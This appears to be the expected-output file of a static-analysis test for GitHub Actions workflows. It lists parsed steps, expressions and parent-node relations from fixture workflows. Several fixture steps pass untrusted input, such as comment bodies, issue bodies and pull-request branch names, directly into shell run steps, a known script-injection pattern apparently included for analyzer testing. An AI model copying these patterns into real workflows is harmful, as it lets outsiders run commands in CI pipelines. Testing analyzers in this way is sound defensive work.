.github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | 